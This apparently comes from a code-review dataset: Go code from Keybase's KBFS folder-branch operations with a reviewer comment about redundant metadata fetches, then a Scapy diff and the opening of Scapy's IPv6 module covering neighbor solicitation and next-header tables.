getUnmergedMDUpdates(ctx, fbo.config, fbo.id(), fbo.bid, fbo.getCurrMDRevision(lState)) } // Returns a list of block pointers that were created during the // staged era. func (fbo *folderBranchOps) undoUnmergedMDUpdatesLocked( ctx context.Context, lState *lockState) ([]BlockPointer, error) { fbo.mdWriterLock.AssertLocked(lState) currHead, unmergedRmds, err := fbo.getUnmergedMDUpdatesLocked(ctx, lState) if err != nil { return nil, err } err = fbo.undoMDUpdatesLocked(ctx, lState, unmergedRmds) if err != nil { return nil, err } // We have arrived at the branch point. The new root is // the previous revision from the current head. Find it // and apply. TODO: somehow fake the current head into // being currHead-1, so that future calls to // applyMDUpdates will fetch this along with the rest of // the updates. fbo.setBranchIDLocked(lState, NullBranchID) rmd, err := getSingleMD(ctx, fbo.config, fbo.id(), NullBranchID, currHead, Merged) if err != nil { return nil, err } err = func() error { fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) err = fbo.setHeadPredecessorLocked(ctx, lState, rmd) if err != nil { return err } fbo.setLatestMergedRevisionLocked(ctx, lState, rmd.Revision(), true) return nil }() if err != nil { return nil, err } // Return all new refs var unmergedPtrs []BlockPointer for _, rmd := range unmergedRmds { for _, op := range rmd.data.Changes.Ops { for _, ptr := range op.Refs() { if ptr != zeroPtr { unmergedPtrs = append(unmergedPtrs, ptr) } } for _, update := range op.AllUpdates() { if update.Ref != zeroPtr { unmergedPtrs = append(unmergedPtrs, update.Ref) } } } } return unmergedPtrs, nil } func (fbo *folderBranchOps) unstageLocked(ctx context.Context, lState *lockState) error { fbo.mdWriterLock.AssertLocked(lState) // fetch all of my unstaged updates, and undo them one at a time bid, wasMasterBranch := fbo.bid, fbo.isMasterBranchLocked(lState) unmergedPtrs, err := fbo.undoUnmergedMDUpdatesLocked(ctx, lState) if err != nil { return err } // let the server know we no longer have need if !wasMasterBranch { err = fbo.config.MDOps().PruneBranch(ctx, fbo.id(), bid) if err != nil { return err } } // now go forward in time, if possible err = fbo.getAndApplyMDUpdates(ctx, lState, fbo.applyMDUpdatesLocked) if err != nil { return err } md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } // Finally, create a resolutionOp with the newly-unref'd pointers. resOp := newResolutionOp() for _, ptr := range unmergedPtrs { resOp.AddUnrefBlock(ptr) } md.AddOp(resOp) return fbo.finalizeMDWriteLocked(ctx, lState, md, &blockPutState{}, NoExcl) } // TODO: remove once we have automatic conflict resolution func (fbo *folderBranchOps) UnstageForTesting( ctx context.Context, folderBranch FolderBranch) (err error) { fbo.log.CDebugf(ctx, "UnstageForTesting") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if folderBranch != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, folderBranch} } return runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() if fbo.isMasterBranch(lState) { // no-op return nil } if fbo.blocks.GetState(lState) != cleanState { return NotPermittedWhileDirtyError{} } // launch unstaging in a new goroutine, because we don't want to // use the provided context because upper layers might ignore our // notifications if we do. But we still want to wait for the // context to cancel. c := make(chan error, 1) freshCtx, cancel := fbo.newCtxWithFBOID() defer cancel() fbo.log.CDebugf(freshCtx, "Launching new context for UnstageForTesting") go func() { lState := makeFBOLockState() c <- fbo.doMDWriteWithRetry(ctx, lState, func(lState *lockState) error { return fbo.unstageLocked(freshCtx, lState) }) }() select { case err := <-c: return err case <-ctx.Done(): return ctx.Err() } }) } // mdWriterLock must be taken by the caller. func (fbo *folderBranchOps) rekeyLocked(ctx context.Context, lState *lockState, promptPaper bool) (err error) { fbo.mdWriterLock.AssertLocked(lState) if !fbo.isMasterBranchLocked(lState) { return errors.New("Can't rekey while staged.") } head := fbo.getHead(lState) if head != (ImmutableRootMetadata{}) { // If we already have a cached revision, make sure we're // up-to-date with the latest revision before inspecting the // metadata, since Rekey doesn't let us go into CR mode, and // we don't actually get folder update notifications when the // rekey bit is set, just a "folder needs rekey" update. if err := fbo.getAndApplyMDUpdates( ctx, lState, fbo.applyMDUpdatesLocked); err != nil { if applyErr, ok := err.(MDRevisionMismatch); !ok || applyErr.rev != applyErr.curr { return err } } } md, rekeyWasSet, err := fbo.getMDForRekeyWriteLocked(ctx, lState) if err != nil { return err } if fbo.rekeyWithPromptTimer != nil { if !promptPaper { fbo.log.CDebugf(ctx, "rekeyWithPrompt superseded before it fires.") } else if !md.IsRekeySet() { fbo.rekeyWithPromptTimer.Stop() fbo.rekeyWithPromptTimer = nil // If the rekey bit isn't set, then some other device // already took care of our request, and we can stop // early. Note that if this FBO never registered for // updates, then we might not yet have seen the update, in // which case we'll still try to rekey but it will fail as // a conflict. fbo.log.CDebugf(ctx, "rekeyWithPrompt not needed because the "+ "rekey bit was already unset.") return nil } } rekeyDone, tlfCryptKey, err := fbo.config.KeyManager(). Rekey(ctx, md, promptPaper) stillNeedsRekey := false switch err.(type) { case nil: // TODO: implement a "forced" option that rekeys even when the // devices haven't changed? if !rekeyDone { fbo.log.CDebugf(ctx, "No rekey necessary") return nil } // Clear the rekey bit if any. md.clearRekeyBit() _, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return err } // Readers can't clear the last revision, because: // 1) They don't have access to the writer metadata, so can't clear the // block changes. // 2) Readers need the MetadataFlagWriterMetadataCopied bit set for // MDServer to authorize the write. // Without this check, MDServer returns an Unauthorized error. if md.GetTlfHandle().IsWriter(uid) { md.clearLastRevision() } case RekeyIncompleteError: if !rekeyDone && rekeyWasSet { // The rekey bit was already set, and there's nothing else // we can to do, so don't put any new revisions. fbo.log.CDebugf(ctx, "No further rekey possible by this user.") return nil } // Rekey incomplete, fallthrough without early exit, to ensure // we write the metadata with any potential changes fbo.log.CDebugf(ctx, "Rekeyed reader devices, but still need writer rekey") case NeedOtherRekeyError: stillNeedsRekey = true case NeedSelfRekeyError: stillNeedsRekey = true default: if err == context.DeadlineExceeded { fbo.log.CDebugf(ctx, "Paper key prompt timed out") // Reschedule the prompt in the timeout case. stillNeedsRekey = true } else { return err } } if stillNeedsRekey { fbo.log.CDebugf(ctx, "Device doesn't have access to rekey") // If we didn't have read access, then we don't have any // unlocked paper keys. Wait for some time, and then if we // still aren't rekeyed, try again but this time prompt the // user for any known paper keys. We do this even if the // rekey bit is already set, since we may have restarted since // the previous rekey attempt, before prompting for the paper // key. Only schedule this as a one-time event, since direct // folder accesses from the user will also cause a // rekeyWithPrompt. // // Only ever set the timer once. if fbo.rekeyWithPromptTimer == nil { d := fbo.config.RekeyWithPromptWaitTime() fbo.log.CDebugf(ctx, "Scheduling a rekeyWithPrompt in %s", d) fbo.rekeyWithPromptTimer = time.AfterFunc(d, fbo.rekeyWithPrompt) } if rekeyWasSet { // Devices not yet keyed shouldn't set the rekey bit again fbo.log.CDebugf(ctx, "Rekey bit already set") return nil } // This device hasn't been keyed yet, fall through to set the rekey bit } // add an empty operation to satisfy assumptions elsewhere md.AddOp(newRekeyOp()) // we still let readers push a new md block that we validate against reader // permissions err = fbo.finalizeMDRekeyWriteLocked(ctx, lState, md) if err != nil { return err } // cache any new TLF crypt key if tlfCryptKey != nil { keyGen := md.LatestKeyGeneration() err = fbo.config.KeyCache().PutTLFCryptKey(md.TlfID(), keyGen, *tlfCryptKey) if err != nil { return err } } // send rekey finish notification handle := md.GetTlfHandle() fbo.config.Reporter().Notify(ctx, rekeyNotification(ctx, fbo.config, handle, true)) if !stillNeedsRekey && fbo.rekeyWithPromptTimer != nil { fbo.log.CDebugf(ctx, "Scheduled rekey timer no longer needed") fbo.rekeyWithPromptTimer.Stop() fbo.rekeyWithPromptTimer = nil } return nil } func (fbo *folderBranchOps) rekeyWithPrompt() { var err error ctx := ctxWithRandomIDReplayable( context.Background(), CtxRekeyIDKey, CtxRekeyOpID, fbo.log) // Only give the user limited time to enter their paper key, so we // don't wait around forever. d := fbo.config.RekeyWithPromptWaitTime() ctx, cancel := context.WithTimeout(ctx, d) defer cancel() if ctx, err = NewContextWithCancellationDelayer(ctx); err != nil { panic(err) } fbo.log.CDebugf(ctx, "rekeyWithPrompt") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { return fbo.rekeyLocked(ctx, lState, true) }) } // Rekey rekeys the given folder. func (fbo *folderBranchOps) Rekey(ctx context.Context, tlf TlfID) (err error) { fbo.log.CDebugf(ctx, "Rekey") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() fb := FolderBranch{tlf, MasterBranch} if fb != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, fb} } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { return fbo.rekeyLocked(ctx, lState, false) }) } func (fbo *folderBranchOps) SyncFromServerForTesting( ctx context.Context, folderBranch FolderBranch) (err error) { fbo.log.CDebugf(ctx, "SyncFromServerForTesting") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if folderBranch != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, folderBranch} } lState := makeFBOLockState() if !fbo.isMasterBranch(lState) { if err := fbo.cr.Wait(ctx); err != nil { return err } // If we are still staged after the wait, then we have a problem. if !fbo.isMasterBranch(lState) { return fmt.Errorf("Conflict resolution didn't take us out of " + "staging.") } } dirtyRefs := fbo.blocks.GetDirtyRefs(lState) if len(dirtyRefs) > 0 { for _, ref := range dirtyRefs { fbo.log.CDebugf(ctx, "DeCache entry left: %v", ref) } return errors.New("Can't sync from server while dirty.") } // A journal flush, if needed. if err := WaitForTLFJournal(ctx, fbo.config, fbo.id(), fbo.log); err != nil { return err } if err := fbo.mdFlushes.Wait(ctx); err != nil { return err } if err := fbo.getAndApplyMDUpdates(ctx, lState, fbo.applyMDUpdates); err != nil { if applyErr, ok := err.(MDRevisionMismatch); ok { if applyErr.rev == applyErr.curr { fbo.log.CDebugf(ctx, "Already up-to-date with server") return nil } } return err } // Wait for all the asynchronous block archiving and quota // reclamation to hit the block server. if err := fbo.fbm.waitForArchives(ctx); err != nil { return err } if err := fbo.fbm.waitForDeletingBlocks(ctx); err != nil { return err } if err := fbo.editHistory.Wait(ctx); err != nil { return err } if err := fbo.fbm.waitForQuotaReclamations(ctx); err != nil { return err } // A second journal flush if needed, to clear out any // archive/remove calls caused by the above operations. return WaitForTLFJournal(ctx, fbo.config, fbo.id(), fbo.log) } // CtxFBOTagKey is the type used for unique context tags within folderBranchOps type CtxFBOTagKey int const ( // CtxFBOIDKey is the type of the tag for unique operation IDs // within folderBranchOps. CtxFBOIDKey CtxFBOTagKey = iota ) // CtxFBOOpID is the display name for the unique operation // folderBranchOps ID tag. const CtxFBOOpID = "FBOID" func (fbo *folderBranchOps) ctxWithFBOID(ctx context.Context) context.Context { return ctxWithRandomIDReplayable(ctx, CtxFBOIDKey, CtxFBOOpID, fbo.log) } func (fbo *folderBranchOps) newCtxWithFBOID() (context.Context, context.CancelFunc) { // No need to call NewContextReplayable since ctxWithFBOID calls // ctxWithRandomIDReplayable, which attaches replayably. ctx := fbo.ctxWithFBOID(context.Background()) ctx, cancelFunc := context.WithCancel(ctx) ctx, err := NewContextWithCancellationDelayer(ctx) if err != nil { panic(err) } return ctx, cancelFunc } // Run the passed function with a context that's canceled on shutdown. func (fbo *folderBranchOps) runUnlessShutdown(fn func(ctx context.Context) error) error { ctx, cancelFunc := fbo.newCtxWithFBOID() defer cancelFunc() errChan := make(chan error, 1) go func() { errChan <- fn(ctx) }() select { case err := <-errChan: return err case <-fbo.shutdownChan: return ShutdownHappenedError{} } } func (fbo *folderBranchOps) registerAndWaitForUpdates() { defer close(fbo.updateDoneChan) childDone := make(chan struct{}) err := fbo.runUnlessShutdown(func(ctx context.Context) error { defer close(childDone) // If we fail to register for or process updates, try again // with an exponential backoff, so we don't overwhelm the // server or ourselves with too many attempts in a hopeless // situation. expBackoff := backoff.NewExponentialBackOff() // Never give up hope until we shut down expBackoff.MaxElapsedTime = 0 // Register and wait in a loop unless we hit an unrecoverable error for { err := backoff.RetryNotifyWithContext(ctx, func() error { // Replace the FBOID one with a fresh id for every attempt newCtx := fbo.ctxWithFBOID(ctx) updateChan, err := fbo.registerForUpdates(newCtx) if err != nil { select { case <-ctx.Done(): // Shortcut the retry, we're done. return nil default: return err } } err = fbo.waitForAndProcessUpdates(newCtx, updateChan) if _, ok := err.(UnmergedError); ok { // skip the back-off timer and continue directly to next // registerForUpdates return nil } select { case <-ctx.Done(): // Shortcut the retry, we're done. return nil default: return err } }, expBackoff, func(err error, nextTime time.Duration) { fbo.log.CDebugf(ctx, "Retrying registerForUpdates in %s due to err: %v", nextTime, err) }) if err != nil { return err } } }) if err != nil && err != context.Canceled { fbo.log.CWarningf(context.Background(), "registerAndWaitForUpdates failed unexpectedly with an error: %v", err) } <-childDone } func (fbo *folderBranchOps) registerForUpdates(ctx context.Context) ( updateChan <-chan error, err error) { lState := makeFBOLockState() currRev := fbo.getCurrMDRevision(lState) fbo.log.CDebugf(ctx, "Registering for updates (curr rev = %d)", currRev) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() // RegisterForUpdate will itself retry on connectivity issues return fbo.config.MDServer().RegisterForUpdate(ctx, fbo.id(), fbo.getLatestMergedRevision(lState)) } func (fbo *folderBranchOps) waitForAndProcessUpdates( ctx context.Context, updateChan <-chan error) (err error) { // successful registration; now, wait for an update or a shutdown fbo.log.CDebugf(ctx, "Waiting for updates") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() lState := makeFBOLockState() for { select { case err := <-updateChan: fbo.log.CDebugf(ctx, "Got an update: %v", err) if err != nil { return err } // Getting and applying the updates requires holding // locks, so make sure it doesn't take too long. ctx, cancel := context.WithTimeout(ctx, backgroundTaskTimeout) defer cancel() err = fbo.getAndApplyMDUpdates(ctx, lState, fbo.applyMDUpdates) if err != nil { fbo.log.CDebugf(ctx, "Got an error while applying "+ "updates: %v", err) return err } return nil case unpause := <-fbo.updatePauseChan: fbo.log.CInfof(ctx, "Updates paused") // wait to be unpaused select { case <-unpause: fbo.log.CInfof(ctx, "Updates unpaused") case <-ctx.Done(): return ctx.Err() } case <-ctx.Done(): return ctx.Err() } } } func (fbo *folderBranchOps) backgroundFlusher(betweenFlushes time.Duration) { ticker := time.NewTicker(betweenFlushes) defer ticker.Stop() lState := makeFBOLockState() var prevDirtyRefMap map[blockRef]bool sameDirtyRefCount := 0 for { doSelect := true if fbo.blocks.GetState(lState) == dirtyState && fbo.config.DirtyBlockCache().ShouldForceSync(fbo.id()) { // We have dirty files, and the system has a full buffer, // so don't bother waiting for a signal, just get right to // the main attraction. doSelect = false } if doSelect { select { case <-ticker.C: case <-fbo.forceSyncChan: case <-fbo.shutdownChan: return } } dirtyRefs := fbo.blocks.GetDirtyRefs(lState) if len(dirtyRefs) == 0 { sameDirtyRefCount = 0 continue } // Make sure we are making some progress currDirtyRefMap := make(map[blockRef]bool) for _, ref := range dirtyRefs { currDirtyRefMap[ref] = true } if reflect.DeepEqual(currDirtyRefMap, prevDirtyRefMap) { sameDirtyRefCount++ } else { sameDirtyRefCount = 0 } if sameDirtyRefCount >= 10 { panic(fmt.Sprintf("Making no Sync progress on dirty refs: %v", dirtyRefs)) } prevDirtyRefMap = currDirtyRefMap fbo.runUnlessShutdown(func(ctx context.Context) (err error) { // Denote that these are coming from a background // goroutine, not directly from any user. ctx = NewContextReplayable(ctx, func(ctx context.Context) context.Context { return context.WithValue(ctx, CtxBackgroundSyncKey, "1") }) // Just in case network access or a bug gets stuck for a // long time, time out the sync eventually. longCtx, longCancel := context.WithTimeout(ctx, backgroundTaskTimeout) defer longCancel() // Make sure this loop doesn't starve user requests for // too long. But use the longer-timeout version in the // actual Sync command, to avoid unnecessary errors. shortCtx, shortCancel := context.WithTimeout(ctx, 1*time.Second) defer shortCancel() for _, ref := range dirtyRefs { select { case <-shortCtx.Done(): fbo.log.CDebugf(ctx, "Stopping background sync early due to timeout") return nil default: } node := fbo.nodeCache.Get(ref) if node == nil { continue } err := fbo.Sync(longCtx, node) if err != nil { // Just log the warning and keep trying to // sync the rest of the dirty files. p := fbo.nodeCache.PathFromNode(node) fbo.log.CWarningf(ctx, "Couldn't sync dirty file with "+ "ref=%v, nodeID=%p, and path=%v: %v", ref, node.GetID(), p, err) } } return nil }) } } func (fbo *folderBranchOps) blockUnmergedWrites(lState *lockState) { fbo.mdWriterLock.Lock(lState) } func (fbo *folderBranchOps) unblockUnmergedWrites(lState *lockState) { fbo.mdWriterLock.Unlock(lState) } func (fbo *folderBranchOps) finalizeResolutionLocked(ctx context.Context, lState *lockState, md *RootMetadata, bps *blockPutState, newOps []op) error { fbo.mdWriterLock.AssertLocked(lState) // Put the blocks into the cache so that, even if we fail below, // future attempts may reuse the blocks. err := fbo.finalizeBlocks(bps) if err != nil { return err } // Last chance to get pre-empted. select { case <-ctx.Done(): return ctx.Err() default: } mdOps := fbo.config.MDOps() if jServer, err := GetJournalServer(fbo.config); err == nil { // Switch to the non-journaled MDOps after flushing all the // resolution block writes -- resolutions must go straight // through to the server or else the journal will get // confused. if err = jServer.Wait(ctx, fbo.id()); err != nil { return err } mdOps = jServer.delegateMDOps } // Put the MD. If there's a conflict, abort the whole process and // let CR restart itself. mdID, err := mdOps.Put(ctx, md) doUnmergedPut := isRevisionConflict(err) if doUnmergedPut { fbo.log.CDebugf(ctx, "Got a conflict after resolution; aborting CR") return err } if err != nil { return err } err = mdOps.PruneBranch(ctx, fbo.id(), fbo.bid) if err != nil { return err } // Queue a rekey if the bit was set. if md.IsRekeySet() { defer fbo.config.RekeyQueue().Enqueue(md.TlfID()) } md.swapCachedBlockChanges() // Set the head to the new MD. fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) irmd := MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now()) err = fbo.setHeadConflictResolvedLocked(ctx, lState, irmd) if err != nil { fbo.log.CWarningf(ctx, "Couldn't set local MD head after a "+ "successful put: %v", err) return err } fbo.setBranchIDLocked(lState, NullBranchID) // Archive the old, unref'd blocks (the revision went straight to // the server, so we know it is merged). fbo.fbm.archiveUnrefBlocks(irmd.ReadOnly()) // notifyOneOp for every fixed-up merged op. for _, op := range newOps { fbo.notifyOneOpLocked(ctx, lState, op, irmd) } fbo.editHistory.UpdateHistory(ctx, []ImmutableRootMetadata{irmd}) return nil } // finalizeResolution caches all the blocks, and writes the new MD to // the merged branch, failing if there is a conflict. It also sends // out the given newOps notifications locally. This is used for // completing conflict resolution. func (fbo *folderBranchOps) finalizeResolution(ctx context.Context, lState *lockState, md *RootMetadata, bps *blockPutState, newOps []op) error { // Take the writer lock. fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.finalizeResolutionLocked(ctx, lState, md, bps, newOps) } func (fbo *folderBranchOps) unstageAfterFailedResolution(ctx context.Context, lState *lockState) error { // Take the writer lock. fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) // Last chance to get pre-empted. select { case <-ctx.Done(): return ctx.Err() default: } fbo.log.CWarningf(ctx, "Unstaging branch %s after a resolution failure", fbo.bid) return fbo.unstageLocked(ctx, lState) } func (fbo *folderBranchOps) onTLFBranchChange(newBID BranchID) { ctx, cancelFunc := fbo.newCtxWithFBOID() defer cancelFunc() // This only happens on a `PruneBranch` call, in which case we // would have already updated fbo's local view of the branch/head. if newBID == NullBranchID { fbo.log.CDebugf(ctx, "Ignoring branch change back to master") return } lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) fbo.log.CDebugf(ctx, "Journal branch change: %s", newBID) if !fbo.isMasterBranchLocked(lState) { if fbo.bid == newBID { fbo.log.CDebugf(ctx, "Already on branch %s", newBID) return } panic(fmt.Sprintf("Cannot switch to branch %s while on branch %s", newBID, fbo.bid)) } md, err := fbo.config.MDOps().GetUnmergedForTLF(ctx, fbo.id(), newBID) if err != nil { fbo.log.CWarningf(ctx, "No unmerged head on journal branch change (bid=%s)", newBID) return } if md == (ImmutableRootMetadata{}) || md.MergedStatus() != Unmerged || md.BID() != newBID { // This can happen if CR got kicked off in some other way and // completed before we took the lock to process this // notification. fbo.log.CDebugf(ctx, "Ignoring stale branch change: md=%v, newBID=%d", md, newBID) return } // Everything we thought we knew about quota reclamation is now // called into question. fbo.fbm.clearLastQRData() // Kick off conflict resolution and set the head to the correct branch. fbo.setBranchIDLocked(lState, newBID) fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized) fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) // We don't currently know the latest merged revision, because we // may have been journaled for a while. We will know it once we // get the latest merged update or when conflict resolution // completes. fbo.setLatestMergedRevisionLocked(ctx, lState, MetadataRevisionUninitialized, true) err = fbo.setHeadSuccessorLocked(ctx, lState, md, true /*rebased*/) if err != nil { fbo.log.CWarningf(ctx, "Could not set head on journal branch change: %v", err) return } } func (fbo *folderBranchOps) handleMDFlush(ctx context.Context, bid BranchID, rev MetadataRevision) { defer fbo.mdFlushes.Done() fbo.log.CDebugf(ctx, "Archiving references for flushed MD revision %d", rev) // Get that revision. rmd, err := getSingleMD(ctx, fbo.config, fbo.id(), NullBranchID, rev, Merged) if err != nil { fbo.log.CWarningf(ctx, "Couldn't get revision %d for archiving: %v", rev, err) return } // We must take the lock so that other users, like exclusive file // creation, can wait for the journal to flush while holding the // lock, and be guaranteed it will stay flushed. lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) fbo.fbm.archiveUnrefBlocks(rmd.ReadOnly()) } func (fbo *folderBranchOps) onMDFlush(bid BranchID, rev MetadataRevision) { ctx, cancelFunc := fbo.newCtxWithFBOID() defer cancelFunc() if bid != NullBranchID { fbo.log.CDebugf(ctx, "Ignoring MD flush on branch %v for revision %d", bid, rev) return } fbo.mdFlushes.Add(1) go fbo.handleMDFlush(ctx, bid, rev) } // GetUpdateHistory implements the KBFSOps interface for folderBranchOps func (fbo *folderBranchOps) GetUpdateHistory(ctx context.Context, folderBranch FolderBranch) (history TLFUpdateHistory, err error) { fbo.log.CDebugf(ctx, "GetUpdateHistory") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if folderBranch != fbo.folderBranch { return TLFUpdateHistory{}, WrongOpsError{fbo.folderBranch, folderBranch} } rmds, err := getMergedMDUpdates(ctx, fbo.config, fbo.id(), MetadataRevisionInitial) if err != nil { return TLFUpdateHistory{}, err } if len(rmds) > 0 { rmd := rmds[len(rmds)-1] history.ID = rmd.TlfID().String() history.Name = rmd.GetTlfHandle().GetCanonicalPath() } history.Updates = make([]UpdateSummary, 0, len(rmds)) writerNames := make(map[keybase1.UID]string) for _, rmd := range rmds { writer, ok := writerNames[rmd.LastModifyingWriter()] if !ok { name, err := fbo.config.KBPKI(). GetNormalizedUsername(ctx, rmd.LastModifyingWriter()) if err != nil { return TLFUpdateHistory{}, err } writer = string(name) writerNames[rmd.LastModifyingWriter()] = writer } updateSummary := UpdateSummary{ Revision: rmd.Revision(), Date: time.Unix(0, rmd.data.Dir.Mtime), Writer: writer, LiveBytes: rmd.DiskUsage(), Ops: make([]OpSummary, 0, len(rmd.data.Changes.Ops)), } for _, op := range rmd.data.Changes.Ops { opSummary := OpSummary{ Op: op.String(), Refs: make([]string, 0, len(op.Refs())), Unrefs: make([]string, 0, len(op.Unrefs())), Updates: make(map[string]string), } for _, ptr := range op.Refs() { opSummary.Refs = append(opSummary.Refs, ptr.String()) } for _, ptr := range op.Unrefs() { opSummary.Unrefs = append(opSummary.Unrefs, ptr.String()) } for _, update := range op.AllUpdates() { opSummary.Updates[update.Unref.String()] = update.Ref.String() } updateSummary.Ops = append(updateSummary.Ops, opSummary) } history.Updates = append(history.Updates, updateSummary) } return history, nil } // GetEditHistory implements the KBFSOps interface for folderBranchOps func (fbo *folderBranchOps) GetEditHistory(ctx context.Context, folderBranch FolderBranch) (edits TlfWriterEdits, err error) { fbo.log.CDebugf(ctx, "GetEditHistory") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if folderBranch != fbo.folderBranch { return nil, WrongOpsError{fbo.folderBranch, folderBranch} } lState := makeFBOLockState() head, err := fbo.getMDForReadHelper(ctx, lState, mdReadNeedIdentify) if err != nil { return nil, err } return fbo.editHistory.GetComplete(ctx, head) } // PushConnectionStatusChange pushes human readable connection status changes. func (fbo *folderBranchOps) PushConnectionStatusChange(service string, newStatus error) { fbo.config.KBFSOps().PushConnectionStatusChange(service, newStatus) }
1
13,276
Wait, so it looks like this function is called _every_ time we fetch the root node, i.e. we do an MD head fetch every time we fetch the root node? Not for this PR, but it seems like we should make that unnecessary, since this function only ever does anything when head is `nil`, i.e. the first time. Maybe add a TODO?
keybase-kbfs
go
@@ -1948,9 +1948,9 @@ class DomainNameListField(StrLenField): islist = 1 padded_unit = 8 - def __init__(self, name, default, fld=None, length_from=None, padded=False): # noqa: E501 + def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 self.padded = padded - StrLenField.__init__(self, name, default, fld, length_from) + StrLenField.__init__(self, name, default, length_from=length_from) def i2len(self, pkt, x): return len(self.i2m(pkt, x))
1
############################################################################# # # # inet6.py --- IPv6 support for Scapy # # see http://natisbad.org/IPv6/ # # for more information # # # # Copyright (C) 2005 Guillaume Valadon <[email protected]> # # Arnaud Ebalard <[email protected]> # # # # This program is free software; you can redistribute it and/or modify it # # under the terms of the GNU General Public License version 2 as # # published by the Free Software Foundation. # # # # This program is distributed in the hope that it will be useful, but # # WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # # General Public License for more details. # # # ############################################################################# """ IPv6 (Internet Protocol v6). """ from __future__ import absolute_import from __future__ import print_function from hashlib import md5 import random import socket import struct from time import gmtime, strftime from scapy.arch import get_if_hwaddr from scapy.as_resolvers import AS_resolver_riswhois from scapy.base_classes import Gen from scapy.compat import chb, orb, raw, plain_str, bytes_encode from scapy.config import conf from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ MTU from scapy.error import log_runtime, warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \ ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \ X3BytesField, XBitField, XIntField, XShortField from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ UDP, UDPerror from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP import scapy.modules.six as six from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 from scapy.supersocket import SuperSocket, L3RawSocket from scapy.utils import checksum, strxor from scapy.pton_ntop import inet_pton, inet_ntop from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo from scapy.volatile import RandInt, RandShort if not socket.has_ipv6: raise socket.error("can't use AF_INET6, IPv6 is disabled") if not hasattr(socket, "IPPROTO_IPV6"): # Workaround for http://bugs.python.org/issue6926 socket.IPPROTO_IPV6 = 41 if not hasattr(socket, "IPPROTO_IPIP"): # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 socket.IPPROTO_IPIP = 4 if conf.route6 is None: # unused import, only to initialize conf.route6 import scapy.route6 # noqa: F401 ########################## # Neighbor cache stuff # ########################## conf.netcache.new_cache("in6_neighbor", 120) @conf.commands.register def neighsol(addr, src, iface, timeout=1, chainCC=0): """Sends and receive an ICMPv6 Neighbor Solicitation message This function sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address address. 'src' address is used as source of the message. Message is sent on iface. By default, timeout waiting for an answer is 1 second. If no answer is gathered, None is returned. Else, the answer is returned (ethernet frame). """ nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) d = inet_ntop(socket.AF_INET6, nsma) dm = in6_getnsmac(nsma) p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, chainCC=chainCC) return res @conf.commands.register def getmacbyip6(ip6, chainCC=0): """Returns the MAC address corresponding to an IPv6 address neighborCache.get() method is used on instantiated neighbor cache. Resolution mechanism is described in associated doc string. (chainCC parameter value ends up being passed to sending function used to perform the resolution, if needed) """ if isinstance(ip6, Net6): ip6 = str(ip6) if in6_ismaddr(ip6): # Multicast mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) return mac iff, a, nh = conf.route6.route(ip6) if iff == conf.loopback_name: return "ff:ff:ff:ff:ff:ff" if nh != '::': ip6 = nh # Found next hop mac = conf.netcache.in6_neighbor.get(ip6) if mac: return mac res = neighsol(ip6, a, iff, chainCC=chainCC) if res is not None: if ICMPv6NDOptDstLLAddr in res: mac = res[ICMPv6NDOptDstLLAddr].lladdr else: mac = res.src conf.netcache.in6_neighbor[ip6] = mac return mac return None ############################################################################# ############################################################################# # IPv6 Class # ############################################################################# ############################################################################# ipv6nh = {0: "Hop-by-Hop Option Header", 4: "IP", 6: "TCP", 17: "UDP", 41: "IPv6", 43: "Routing Header", 44: "Fragment Header", 47: "GRE", 50: "ESP Header", 51: "AH Header", 58: "ICMPv6", 59: "No Next Header", 60: "Destination Option Header", 112: "VRRP", 132: "SCTP", 135: "Mobility Header"} ipv6nhcls = {0: 